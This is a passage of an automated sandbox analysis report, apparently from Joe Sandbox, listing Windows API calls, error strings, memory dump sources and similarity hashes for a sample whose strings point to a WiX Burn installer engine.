                                                                                                                                                                                                                                                                                                  • Instruction ID: bc4f9a42b7d620e2c1deb233643c9c7a8b5262318214a58d5b00ac1b7151e4d7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c7b8dafe2df43d72cd26a40b07dd8aef786f60a8b22fe40689f22cbac0fa14f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C001DB72E4173967E720AB645C06F9A7758FB05710F110175FD14F7282FA659D008BD6
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00865EA6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00865EB2,00000000), ref: 008A0AE0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetProcAddress.KERNEL32(00000000), ref: 008A0AE7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetLastError.KERNEL32(?,?,?,00865EB2,00000000), ref: 008A0AFE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A3D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 008A3D4C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 00865F0A
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 00865ED0
                                                                                                                                                                                                                                                                                                  • Failed to get shell folder., xrefs: 00865EDA
                                                                                                                                                                                                                                                                                                  • Failed to get 64-bit folder., xrefs: 00865EF0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2084161155-3906113122
                                                                                                                                                                                                                                                                                                  • Opcode ID: e5e36e0c4a9086a513fd8095345794202ad80a039aa0124b53530e2eb14ba342
                                                                                                                                                                                                                                                                                                  • Instruction ID: c432cee85e4dc90fa489733035848e8d6a12b06cb48dc45434db13d685d989bc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5e36e0c4a9086a513fd8095345794202ad80a039aa0124b53530e2eb14ba342
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05018432941729BBEF22A794DC06BAE7A68FF01721F114151F800F6A50DF759B409BE6
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindFirstFileW.KERNEL32(0088923A,?,00000100,00000000,00000000), ref: 008A447B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindClose.KERNEL32(00000000), ref: 008A4487
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(0088923A,00000080,00000000,0088923A,000000FF,00000000,?,?,0088923A), ref: 008A4182
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0088923A), ref: 008A418C
                                                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(0088923A,00000000,0088923A,000000FF,00000000,?,?,0088923A), ref: 008A41AC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0088923A), ref: 008A41B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3967264933-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 849325452b23ce4c7041111bb4243aef3c22d9393afc928bb2bd7e76dd8ca93b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8e3b974a850baaa8e4c1f9d37b1edf4f88f89d5fc7de21def9a8cf1fcb6bc79f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 849325452b23ce4c7041111bb4243aef3c22d9393afc928bb2bd7e76dd8ca93b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD01F532A41636ABFF314AA98C05B5B7E98FF26761F010220FD44EB991E7A2CD9085D0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0088DA1A
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0088DA5F
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?), ref: 0088DA73
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failure while sending progress during BITS job modification., xrefs: 0088DA4E
                                                                                                                                                                                                                                                                                                  • Failed to get state during job modification., xrefs: 0088DA33
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                                                                                                                                                                                                                                                                  • API String ID: 3094578987-1258544340
                                                                                                                                                                                                                                                                                                  • Opcode ID: ba968ca759cbbd5dde442b66ceccccabd6e69b07701eaf4c0eb04b5e1eddc8ad
                                                                                                                                                                                                                                                                                                  • Instruction ID: 37ea36f0965b8155e952bdb7a3be911fe4474add1ff5a9724f44443567484695
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba968ca759cbbd5dde442b66ceccccabd6e69b07701eaf4c0eb04b5e1eddc8ad
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA01D232604725FBDB15EF55C848A6EB7B8FF05321B104209E904D7641D730ED04CBD1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,0088DDEE), ref: 0088DC92
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000008,?,0088DDEE), ref: 0088DCD7
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,0088DDEE), ref: 0088DCEB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get BITS job state., xrefs: 0088DCAB
                                                                                                                                                                                                                                                                                                  • Failure while sending progress., xrefs: 0088DCC6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get BITS job state.$Failure while sending progress.
                                                                                                                                                                                                                                                                                                  • API String ID: 3094578987-2876445054
                                                                                                                                                                                                                                                                                                  • Opcode ID: db91af423021b9afcb91b9cb213927418e18254574407bf5189d6361d25e875c
                                                                                                                                                                                                                                                                                                  • Instruction ID: faeebd161298c1081288394abf30f2f6669bdda119ee834fd5d0b29d3bceeb1f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db91af423021b9afcb91b9cb213927418e18254574407bf5189d6361d25e875c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F301F532601725FBD711AB45D849E9EB7A9FF05320B000156F904D3B81DB70ED00CBD5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,0088DF52,?,?,?,?,?,?,00000000,00000000), ref: 0088D802
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0088DF52,?,?,?,?,?,?,00000000,00000000), ref: 0088D80D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0088DF52,?,?,?,?,?,?,00000000,00000000), ref: 0088D81A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to create BITS job complete event., xrefs: 0088D848
                                                                                                                                                                                                                                                                                                  • bitsengine.cpp, xrefs: 0088D83E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateCriticalErrorEventInitializeLastSection
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create BITS job complete event.$bitsengine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3069647169-3441864216
                                                                                                                                                                                                                                                                                                  • Opcode ID: bdf338b2ffd9b2c6d384df7a584b820e6b84836afba6aa8127d798572dd649ba
                                                                                                                                                                                                                                                                                                  • Instruction ID: a04ee87c2bba3e69eb8ed7f907bab434debc85ab244dca75bb0df16a5f101a32
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdf338b2ffd9b2c6d384df7a584b820e6b84836afba6aa8127d798572dd649ba
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD017576941737ABD3109F59DC05A8ABFA8FF09760B014126FD18E7A41D770D800CBE5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00877040,000000B8,00000000,?,00000000,75A4B390), ref: 0086D4B7
                                                                                                                                                                                                                                                                                                  • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0086D4C6
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000D0,?,00877040,000000B8,00000000,?,00000000,75A4B390), ref: 0086D4DB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Engine active cannot be changed because it was already in that state., xrefs: 0086D4FE
                                                                                                                                                                                                                                                                                                  • userexperience.cpp, xrefs: 0086D4F4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                                                                                                                                                                                                                                                                  • String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3376869089-1544469594
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7486f378e7548da487d43915433e7d477495225cbf438d821ce42a0e2278e938
                                                                                                                                                                                                                                                                                                  • Instruction ID: 455c2a19680939f68d010539769f98bc7f1e39771bfbfb935f1e939b1f0dd28a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7486f378e7548da487d43915433e7d477495225cbf438d821ce42a0e2278e938
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAF0AF32704708AFA7206FAAAC89D9773BCFB96761301442AB611D3A41DB74EC058760
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 008A1CB3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008649DA,00000001,?,?,00864551,?,?,?,?,00865466,?,?,?,?), ref: 008A1CC2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                                  • String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 199729137-398595594
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0089490E,00000000,?,008948AE,00000000,008C7F08,0000000C,00894A05,00000000,00000002), ref: 0089497D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00894990
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0089490E,00000000,?,008948AE,00000000,008C7F08,0000000C,00894A05,00000000,00000002), ref: 008949B3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008793C9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A56CF: GetLastError.KERNEL32(?,?,0087933A,?,00000003,00000000,?), ref: 008A56EE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to read certificate thumbprint., xrefs: 008793BD
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 008793ED
                                                                                                                                                                                                                                                                                                  • Failed to get certificate public key identifier., xrefs: 008793F7
                                                                                                                                                                                                                                                                                                  • Failed to find expected public key in certificate chain., xrefs: 0087938A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-3408201827
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 008621F2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 008621FE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: HeapSize.KERNEL32(00000000,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BE2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3662877508-3612885251
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 008A95D5
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 008A9610
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008A962C
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008A9639
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008A9646
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,008A95C2,00000001), ref: 008A0FED
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close$InfoOpenQuery
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 796878624-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 309a30a8b5bc886bae19d47d01575e878f516861f40eb64d6ee15e46f009975f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8a9afb7131410c789802a1e0262f738db6127ce34626e7f59346e0b066e5e69f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 309a30a8b5bc886bae19d47d01575e878f516861f40eb64d6ee15e46f009975f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF416D72C0022DFFEF21AF98CC819ADFBB9FF25754F11416AE950B6521C7314E509A90
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00868BC8,0086972D,?,0086972D,?,?,0086972D,?,?), ref: 00868A27
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00868BC8,0086972D,?,0086972D,?,?,0086972D,?,?), ref: 00868A2F
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00868BC8,0086972D,?,0086972D,?), ref: 00868A7E
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00868BC8,0086972D,?,0086972D,?), ref: 00868AE0
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00868BC8,0086972D,?,0086972D,?), ref: 00868B0D
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString$lstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1657112622-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 160b4a11aefb00d2d908609fb7cd5cdca243a0cd1839773d174c921771aa7737
                                                                                                                                                                                                                                                                                                  • Instruction ID: caff1f6e3e33b5f4537858b79e2d0119695333b99bf714d5631b657481e1bea2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 160b4a11aefb00d2d908609fb7cd5cdca243a0cd1839773d174c921771aa7737
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE314172A00118EFCB118E98CC85AAE3F6AFB49395F168616FD0DD7111CA719990DB92
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(008653BD,WixBundleOriginalSource,?,?,0087A623,840F01E8,WixBundleOriginalSource,?,008CAA90,?,00000000,00865445,00000001,?,?,00865445), ref: 008674C3
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(008653BD,008653BD,00000000,00000000,?,?,0087A623,840F01E8,WixBundleOriginalSource,?,008CAA90,?,00000000,00865445,00000001,?), ref: 0086752A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 008674BF
                                                                                                                                                                                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 00867519
                                                                                                                                                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 008674FD
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
